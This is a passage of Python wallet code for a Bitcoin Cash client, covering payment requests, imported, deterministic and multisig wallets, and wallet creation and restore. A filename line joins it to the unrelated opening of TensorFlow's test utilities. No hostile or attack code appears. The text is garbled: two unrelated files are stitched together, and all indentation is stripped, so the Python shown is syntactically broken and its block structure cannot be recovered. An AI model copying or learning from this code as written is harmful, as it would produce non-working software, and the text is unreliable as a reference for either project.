'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
